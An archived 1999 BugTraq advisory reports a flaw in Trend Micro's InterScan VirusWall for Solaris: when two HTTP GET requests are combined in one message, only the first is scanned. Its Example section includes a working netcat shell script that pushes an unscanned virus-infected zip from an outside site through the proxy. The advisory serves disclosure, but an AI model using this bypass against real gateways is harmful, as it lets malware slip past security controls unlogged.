home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / interscan_viruswall.txt < prev    next >
Encoding:
Internet Message Format  |  1999-03-26  |  4.7 KB

  1. Date: Mon, 22 Feb 1999 21:31:51 +0100
  2. From: The Unicorn <unicorn@BLACKHATS.ORG>
  3. To: BUGTRAQ@netspace.org
  4. Subject: BlackHats Advisory -- InterScan VirusWall
  5.  
  6.                          BlackHats Security Advisory
  7.  
  8.  
  9.            Release date: February 22, 1999
  10.             Application: InterScan Viruswall for Solaris
  11.                Severity: Any user can download binaries and virus
  12.                          infected files though the VirusWall
  13.  
  14.               Author(s): s10@blackhats.org, unicorn@blackhats.org
  15.  
  16. ---
  17. Overview :
  18. ---
  19.  
  20.         InterScan VirusWall  is part of Trend  Micro's integrated family
  21. of virus protection  products that covers every access  point - Internet
  22. gateways,  groupware,  e-mail and  intranet  servers,  LAN servers,  and
  23. desktops. InterScan VirusWall  scans inbound and outbound  SMTP mail and
  24. attachments, FTP and HTTP traffic  in real time. It automatically cleans
  25. infected files and detects malicious Java applets and ActiveX objects.
  26.  
  27.         When two HTML GET commands are  combined in one request, of wich
  28. the former points to a non-scanned file like a graphic image (i.e. a GIF
  29. file) and the  latter to a possibly infected binary  or macro file, both
  30. of the  files are  passed to  the user requesting  the data  without any
  31. warning  or logging  by the  VirusWall. We  found that  this combination
  32. was  sometimes  generated  by  well-known  web  browsers  like  Netscape
  33. Communicator and Microsoft Internet Explorer during normal use.
  34.  
  35.         We informed  Trend Micro of  this vulnerability more  than three
  36. weeks  ago. We  fully described  the  problem to  Trend Engineering  and
  37. included an exploit  similar to the one described below  and all traffic
  38. between the  browser and VirusWall, but  did not receive a  fix for this
  39. problem. The explanation received was that they were unable to reproduce
  40. it on  their systems.  Since these  systems are  used to  protect people
  41. behind (expensive)  firewall configurations against virus  infection, we
  42. decided to make, at least, the  administrators of these systems aware of
  43. this exploit  that can be  used by  users behind an  InterScan VirusWall
  44. configuration to circumvent the implemented security policy.
  45.  
  46. ---
  47. Affected systems:
  48. ---
  49.  
  50.         InterScan Viruswall for Solaris
  51.         Implementations of  InterScan VirusWall  on other  platforms are
  52.         likely to be vulnerable, but are not tested since we do not have
  53.         them available
  54.  
  55. ---
  56. Workarounds/Fixes:
  57. ---
  58.  
  59.         We have  not yet received  a fix from  Trend Micro. It  might be
  60. possible  to close  this  hole by  scanning *ALL*  data  passed in  HTTP
  61. traffic, but  this will have a  negative influence on the  throughput of
  62. the complete firewall configuration.
  63.  
  64. ---
  65. Example:
  66. ---
  67.  
  68.         We developed  the following exploit  that requests two  files in
  69. one message. The first  one is a simple graphic file  (in this case form
  70. the Trend Micro web-site) and the second one is a file containing a well
  71. known macro-virus, which  would normally be detected and  removed by the
  72. product. Using the netcat tool we  send this combined request out to the
  73. world using  the VirusWall as  a proxy-server. The  information received
  74. back is stored in a file. When later examining the file we find both the
  75. graphic and the  virus infected contents requested.  Looking through the
  76. logfiles no trace is found of this file seeping through the hole.
  77.  
  78. #!/bin/sh
  79. echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
  80. Referer: http://www.antivirus.com/index.html
  81. Proxy-Connection: Keep-Alive
  82. User-Agent: Mozilla/4.5 [en] (WinNT; I)
  83. Host: www.antivirus.com
  84. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png
  85. Accept-Encoding: gzip
  86. Accept-Language: en
  87. Accept-Charset: iso-8859-1,*,utf-8
  88.  
  89. GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
  90. Referer: http://sourceofkaos.com/homes/knowdeth/index.html
  91. Proxy-Connection: Keep-Alive
  92. User-Agent: Mozilla/4.5 [en] (WinNT; I)
  93. Host: sourceofkaos.com
  94. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
  95. image/png, */*
  96. Accept-Encoding: gzip
  97. Accept-Language: en
  98. Accept-Charset: iso-8859-1,*,utf-8
  99.  
  100. " | nc viruswall 80 > the.results
  101.  
  102.         Changing the second part of  this "code" will enable downloading
  103. any information  through the  Trend Micro InterScan  VirusWall. Probably
  104. because the  product only acts  on the first  GET command in  a message,
  105. while retrieving all information requested.
  106.  
  107. ---
  108. Further Study:
  109. ---
  110.  
  111.         Further study  of this vulnerability  may focus on FTP  and SMTP
  112. traffic and the detection of malicious Java applets and ActiveX objects.
  113.  
  114.  
  115. Ciao,
  116. Unicorn.
  117. --
  118. ======= _ __,;;;/ TimeWaster ================================================
  119.      ,;( )_, )~\| A Truly Wise Man Never Plays
  120.     ;; //  `--;     Leapfrog With A Unicorn...
  121. ==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======
  122.  
  123.